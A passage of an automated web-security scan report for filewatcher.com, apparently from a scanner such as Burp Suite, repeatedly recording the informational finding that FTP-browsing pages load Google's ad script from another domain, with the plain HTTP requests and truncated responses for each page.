  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uar.net/pub/FreeBSD/packages-4.9/news.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:01:40 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ofx+BlY29SFGSchrgl4/fw"
Content-Length: 18297
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:01:40 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 633
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uar.net/pub/FreeBSD/packages
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.913. http://www.filewatcher.com/b/ftp/ftp.uni-frankfurt.de.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-frankfurt.de.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-frankfurt.de.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:06 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "3FKR//M/VzO0ybVLDQ88UA"
Content-Length: 5268
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:06 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 739
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-frankfurt.de/ - FTP Brow
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.914. http://www.filewatcher.com/b/ftp/ftp.uni-frankfurt.de/pub.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-frankfurt.de/pub.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-frankfurt.de/pub.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:07 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "3r4nAIWyHdvjLGDtk87Ktw"
Content-Length: 6439
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:07 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 739
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-frankfurt.de/pub/ - FTP
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.915. http://www.filewatcher.com/b/ftp/ftp.uni-frankfurt.de/pub/unix.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-frankfurt.de/pub/unix.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-frankfurt.de/pub/unix.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:07 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "A9Vsf4u4r6+MZ7t0Hz3QMQ"
Content-Length: 5544
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:07 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 740
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-frankfurt.de/pub/unix/ -
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.916. http://www.filewatcher.com/b/ftp/ftp.uni-frankfurt.de/pub/unix/linux.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-frankfurt.de/pub/unix/linux.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-frankfurt.de/pub/unix/linux.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:07 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "JmFdxcgVZskOzsQCBBoAHw"
Content-Length: 5463
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:07 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 744
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-frankfurt.de/pub/unix/li
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.917. http://www.filewatcher.com/b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:08 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "XVyeOF5m9cgFghmHcAFtDA"
Content-Length: 6787
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 747
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-frankfurt.de/pub/unix/li
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.918. http://www.filewatcher.com/b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:08 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "nQ3t6ZBxUCns3nj+xErLDA"
Content-Length: 7675
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 745
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-frankfurt.de/pub/unix/li
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.919. http://www.filewatcher.com/b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:09 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "qZyelIJoKPNJXor9daDp4Q"
Content-Length: 7944
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:09 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 745
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-frankfurt.de/pub/unix/li
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.920. http://www.filewatcher.com/b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat/7.0.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat/7.0.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat/7.0.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:09 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "/Fu95NTh1JthXPiRtJIo6Q"
Content-Length: 6128
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:09 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 747
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-frankfurt.de/pub/unix/li
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.921. http://www.filewatcher.com/b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat/7.0/i386.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat/7.0/i386.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat/7.0/i386.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:09 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "eCAiTRzqOBO/EENKEemz/A"
Content-Length: 10921
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:09 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 750
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-frankfurt.de/pub/unix/li
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.922. http://www.filewatcher.com/b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat/7.0/i386/powertools.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat/7.0/i386/powertools.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat/7.0/i386/powertools.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "JObSaJsDKme/IGb3qH98bQ"
Content-Length: 6764
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:10 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 750
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-frankfurt.de/pub/unix/li
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.923. http://www.filewatcher.com/b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat/7.0/i386/powertools/headers.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat/7.0/i386/powertools/headers.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-frankfurt.de/pub/unix/linux/freshrpms/ayo/redhat/7.0/i386/powertools/headers.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:10 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "IshrHJdRqRqRj2W53teqbg"
Content-Length: 22935
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:02:10 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
Age: 754
X-Cache: HIT from squid.galaxy.xx
X-Cache-Lookup: HIT from squid.galaxy.xx:80
X-Cache: MISS from www.maruhn.com
X-Cache-Lookup: MISS from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-frankfurt.de/pub/unix/li
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.924. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:47 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "xCg5FUdXQO+NojFE2qm4EQ"
Content-Length: 5684
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 544
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/ - FTP Brows
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.925. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de/pub.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:47 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "itwI89L7MLyy4ZxIfzkSSw"
Content-Length: 5801
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:47 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 544
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/ - FTP B
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.926. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de/pub/mirror.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:48 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "k19iBFqxBaya1CYYp4mQKg"
Content-Length: 8738
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 545
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.927. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:48 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "ZCi2F8p63kVLp9MLxiOMpg"
Content-Length: 5992
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:48 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 546
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.928. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:00:56 GMT
Server: Apache/2.2.9 (Debian) mod_perl/2.0.4 Perl/v5.10.0
ETag: "HC+Xt/4q5gAESBsFLZ+a1Q"
Content-Length: 14115
Cache-Control: max-age=604800
Expires: Mon, 31 Jan 2011 16:00:56 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-1
X-Cache: MISS from squid.galaxy.xx
X-Cache-Lookup: MISS from squid.galaxy.xx:80
Age: 581
X-Cache: HIT from www.maruhn.com
X-Cache-Lookup: HIT from www.maruhn.com:80
Via: 1.1 squid.galaxy.xx:80 (squid), 1.0 www.maruhn.com:80 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head>
<link rel="stylesheet" href="/css/fw2.css">
<title>ftp.uni-hannover.de/pub/mirror/b
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...

21.929. http://www.filewatcher.com/b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports.0.0.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.filewatcher.com
Path:   /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports.0.0.html

Issue detail

The response dynamically includes the following script from another domain:
  • http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /b/ftp/ftp.uni-hannover.de/pub/mirror/bsd/FreeBSD/ports.0.0.html HTTP/1.1
Host: www.filewatcher.com
Accept: */*
Accept-Language: en
